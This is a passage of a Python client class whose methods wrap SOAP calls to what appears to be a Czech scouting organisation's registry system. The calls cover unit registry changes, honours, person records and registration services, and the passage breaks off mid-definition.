# Načíst detail registrační vady jednotky
def UnitMistakeReportDetail(self, ID_Login, ID):
return self._client.service.UnitMistakeReportDetail({"ID_Login": ID_Login, "ID": ID})
# Upravit registrační vadu jednotky
def UnitMistakeReportUpdate(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.UnitMistakeReportUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Mistake": ID_Mistake, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Načíst věkovou kategorii oddílu
def UnitAgeCategoryDetail(self, ID_Login, ID_Unit):
return self._client.service.UnitAgeCategoryDetail({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Nastaví věkovou kategorii oddílu
def UnitAgeCategoryUpdate(self, ID_Login, ID, ID_AgeCategory):
return self._client.service.UnitAgeCategoryUpdate({"ID_Login": ID_Login, "ID": ID, "ID_AgeCategory": ID_AgeCategory})
# Načte seznam handicapů a počty lidí s handicapem pro oddíl
def UnitHandicapAllUnit(self, ID_Login, ID_Unit):
return self._client.service.UnitHandicapAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Načte datum poslení editace handicapů jednotky
def UnitHandicapLastUpdated(self, ID_Login, ID_Unit):
return self._client.service.UnitHandicapLastUpdated({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Nastaví pro jednotku počet lidí s příslušným handicapem
def UnitHandicapUpdate(self, ID_Login, ID_Unit, ID_HandicapType, Value):
return self._client.service.UnitHandicapUpdate({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_HandicapType": ID_HandicapType, "Value": Value})
# Nastavit zda se provede automatická změna časopisů zdarma
def UnitUpdateChangeFreeJournal(self, ID_Login, ID, ChangeFreeJournal, IncludeChild=None):
return self._client.service.UnitUpdateChangeFreeJournal({"ID_Login": ID_Login, "ID": ID, "ChangeFreeJournal": ChangeFreeJournal, "IncludeChild": IncludeChild})
# Načíst seznam požadavků na změnu v registru OJ
def RegistryAll(self, ID_Login, ID_Unit, DateCreateFrom, DateCreateTo, DateCreateMonth, DateCreateYear, DisplayName=None, ID_RegistryObject=None, ID_RegistryType=None, ID_RegistryState=None):
return self._client.service.RegistryAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "DateCreateFrom": DateCreateFrom, "DateCreateTo": DateCreateTo, "DateCreateMonth": DateCreateMonth, "DateCreateYear": DateCreateYear, "DisplayName": DisplayName, "ID_RegistryObject": ID_RegistryObject, "ID_RegistryType": ID_RegistryType, "ID_RegistryState": ID_RegistryState})
# Načíst seznam požadavků pro odeslání zpráv
def RegistryAllMessage(self, ID_Login):
return self._client.service.RegistryAllMessage({"ID_Login": ID_Login})
# Načíst seznam požadavků na změnu pro MV ČR
def RegistryAllMinistry(self, ID_Login):
return self._client.service.RegistryAllMinistry({"ID_Login": ID_Login})
# Načíst detail požadavku na změnu v registru OJ
def RegistryDetail(self, ID_Login, ID):
return self._client.service.RegistryDetail({"ID_Login": ID_Login, "ID": ID})
# Odeslat zprávu o změně statutára střediska nadřízené jednotce
def RegistrySendFunctionParentMessage(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistrySendFunctionParentMessage({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Načíst seznam stavů požadavku registru OJ
def RegistryStateAll(self, ID_Login, DisplayName=None):
return self._client.service.RegistryStateAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Načíst seznam typů požadavku registru OJ
def RegistryTypeAll(self, ID_Login, DisplayName=None, ID_RegistryObject=None):
return self._client.service.RegistryTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_RegistryObject": ID_RegistryObject})
# Zrušit požadavek na změnu v registru OJ
def RegistryUpdateCancel(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistryUpdateCancel({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Uzavřít požadavek na změnu v registru OJ
def RegistryUpdateClose(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistryUpdateClose({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Odeslat požadavek na změnu v registru OJ na MV ČR
def RegistryUpdateSend(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistryUpdateSend({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Odeslat zprávy požadavků na změnu registru OJ
def RegistryUpdateSendMessage(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistryUpdateSendMessage({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Zrušit odevzdání hospodářského výkazu jednotky
def StatementUpdateOpen(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
return self._client.service.StatementUpdateOpen({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
# Stáhnout soubor se scanem návrhu
def PersonHonourDownloadScan(self, ID_Login, ID):
return self._client.service.PersonHonourDownloadScan({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam vyznamenání, které osoba může udělit
def HonourAllGrant(self, ID_Login, ID, DisplayName=None):
return self._client.service.HonourAllGrant({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam vyznamenání
def HonourAll(self, ID_Login, ID, IsActive, DisplayName=None):
return self._client.service.HonourAll({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "DisplayName": DisplayName})
# Načíst detail vyznamenání
def HonourDetail(self, ID_Login, ID):
return self._client.service.HonourDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst obrázek vyznamenání
def HonourImage(self, ID_Login, ID):
return self._client.service.HonourImage({"ID_Login": ID_Login, "ID": ID})
# Založit vyznamenání
def HonourInsert(self, ID_Login, ID, IsActive, MaxCount, DisplayName=None, Description=None, FileName=None, ImageContent=None, StateUrl=None, DescriptionUrl=None):
return self._client.service.HonourInsert({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "MaxCount": MaxCount, "DisplayName": DisplayName, "Description": Description, "FileName": FileName, "ImageContent": ImageContent, "StateUrl": StateUrl, "DescriptionUrl": DescriptionUrl})
# Načíst seznam jednotek vyznamenání
def HonourUnitAll(self, ID_Login, ID_Honour, ID_Unit):
return self._client.service.HonourUnitAll({"ID_Login": ID_Login, "ID_Honour": ID_Honour, "ID_Unit": ID_Unit})
# Smazat jednotku, ve které se vyznamenání uděluje
def HonourUnitDelete(self, ID_Login, ID):
return self._client.service.HonourUnitDelete({"ID_Login": ID_Login, "ID": ID})
# Založit jednotku, ve které se vyznamenání uděluje
def HonourUnitInsert(self, ID_Login, ID_Honour, ID_Unit):
return self._client.service.HonourUnitInsert({"ID_Login": ID_Login, "ID_Honour": ID_Honour, "ID_Unit": ID_Unit})
# Upravit vyznamenání
def HonourUpdate(self, ID_Login, ID, IsActive, MaxCount, DisplayName=None, Description=None, FileName=None, ImageContent=None, StateUrl=None, DescriptionUrl=None):
return self._client.service.HonourUpdate({"ID_Login": ID_Login, "ID": ID, "IsActive": IsActive, "MaxCount": MaxCount, "DisplayName": DisplayName, "Description": Description, "FileName": FileName, "ImageContent": ImageContent, "StateUrl": StateUrl, "DescriptionUrl": DescriptionUrl})
# Hledání dospělých osob
def PersonAllJobs(self, ID_Login, ID, FirstName=None, LastName=None, NickName=None):
return self._client.service.PersonAllJobs({"ID_Login": ID_Login, "ID": ID, "FirstName": FirstName, "LastName": LastName, "NickName": NickName})
# Načíst seznam jubilantů
def PersonAllJubilant(self, ID_Login, Settings=None):
return self._client.service.PersonAllJubilant({"ID_Login": ID_Login, "Settings": Settings})
# Načíst seznam vyznamenání osoby
def PersonHonourAll(self, IsValid, ID_Login, ID_Person, ID_Honour, YearValidFrom, PersonDisplayName=None, LetterNumber=None, Suggester=None):
return self._client.service.PersonHonourAll({"IsValid": IsValid, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "YearValidFrom": YearValidFrom, "PersonDisplayName": PersonDisplayName, "LetterNumber": LetterNumber, "Suggester": Suggester})
# Načíst seznam vyznamenání osoby
def PersonHonourAllLogin(self, IsValid, ID_Login, ID_Person, ID_Honour, YearValidFrom, PersonDisplayName=None, LetterNumber=None, Suggester=None):
return self._client.service.PersonHonourAllLogin({"IsValid": IsValid, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "YearValidFrom": YearValidFrom, "PersonDisplayName": PersonDisplayName, "LetterNumber": LetterNumber, "Suggester": Suggester})
# Načíst seznam vyznamenání osoby
def PersonHonourAllPerson(self, ShowHistory, ID_Login, ID_Person, ID_Honour, IsValid):
return self._client.service.PersonHonourAllPerson({"ShowHistory": ShowHistory, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "IsValid": IsValid})
# Smazat vyznamenání osoby
def PersonHonourDelete(self, ID_Login, ID):
return self._client.service.PersonHonourDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail vyznamenání osoby
def PersonHonourDetail(self, ID_Login, ID):
return self._client.service.PersonHonourDetail({"ID_Login": ID_Login, "ID": ID})
# Založit vyznamenání osoby
def PersonHonourInsert(self, ID_Login, ID_Person, ID_Honour, ValidFrom, ValidTo, ID_PersonSuggester, ID_UnitSuggester, InMemorian, Suggester=None, LetterNumber=None, Reason=None, FileName=None, FileContent=None, Person=None):
return self._client.service.PersonHonourInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSuggester": ID_PersonSuggester, "ID_UnitSuggester": ID_UnitSuggester, "InMemorian": InMemorian, "Suggester": Suggester, "LetterNumber": LetterNumber, "Reason": Reason, "FileName": FileName, "FileContent": FileContent, "Person": Person})
# Upravit vyznamenání osoby
def PersonHonourUpdate(self, ID_Login, ID, ID_Person, ID_Honour, ValidFrom, ValidTo, ID_PersonSuggester, ID_UnitSuggester, InMemorian, Person=None, Honour=None, Suggester=None, SuggesterDisplayName=None, LetterNumber=None, Reason=None, FileName=None, FileContent=None, IdentificationCode=None, IdentificationCodeSuggester=None):
return self._client.service.PersonHonourUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Honour": ID_Honour, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSuggester": ID_PersonSuggester, "ID_UnitSuggester": ID_UnitSuggester, "InMemorian": InMemorian, "Person": Person, "Honour": Honour, "Suggester": Suggester, "SuggesterDisplayName": SuggesterDisplayName, "LetterNumber": LetterNumber, "Reason": Reason, "FileName": FileName, "FileContent": FileContent, "IdentificationCode": IdentificationCode, "IdentificationCodeSuggester": IdentificationCodeSuggester})
# Editace typu osoby
def PersonUpdatePersonType(self, ID_Login, ID, ID_PersonType=None):
return self._client.service.PersonUpdatePersonType({"ID_Login": ID_Login, "ID": ID, "ID_PersonType": ID_PersonType})
# Načíst seznam služeb registrace
def RegistrationServiceAll(self, ID_Login, ID_UnitRegistration, ID_RegistrationServiceType=None):
return self._client.service.RegistrationServiceAll({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "ID_RegistrationServiceType": ID_RegistrationServiceType})
# Založit službu registrace
def RegistrationServiceInsert(self, ID_Login, ID_UnitRegistration, Ammount, ID_VatRate, ID_RegistrationServiceType=None):
return self._client.service.RegistrationServiceInsert({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "Ammount": Ammount, "ID_VatRate": ID_VatRate, "ID_RegistrationServiceType": ID_RegistrationServiceType})
# Načíst seznam typů služeb registrace
def RegistrationServiceTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.RegistrationServiceTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Načíst seznam registrací nadřízené jednotky
def UnitRegistrationAllParent(self, ID_Login, ID_Unit):
return self._client.service.UnitRegistrationAllParent({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Nastavit zasílání časopisu pro rodiče členům jednotky
def UnitUpdateJournalParent(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
